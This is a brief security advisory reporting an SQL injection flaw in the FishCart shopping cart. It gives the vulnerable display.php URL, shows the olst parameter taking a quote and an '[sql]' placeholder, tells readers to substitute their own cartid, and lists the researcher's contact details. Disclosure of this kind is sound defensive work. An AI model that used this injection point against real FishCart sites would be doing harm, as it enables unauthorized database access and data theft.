vendor site: http://fishcart.org/ 
product :fish cart
bug:injection sql
risk : medium

injection sql :
/display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='[sql]

( change the cartid value with yours )

laurent gaffie
http://s-a-p.ca/ 
contact: saps.audit@gmail.com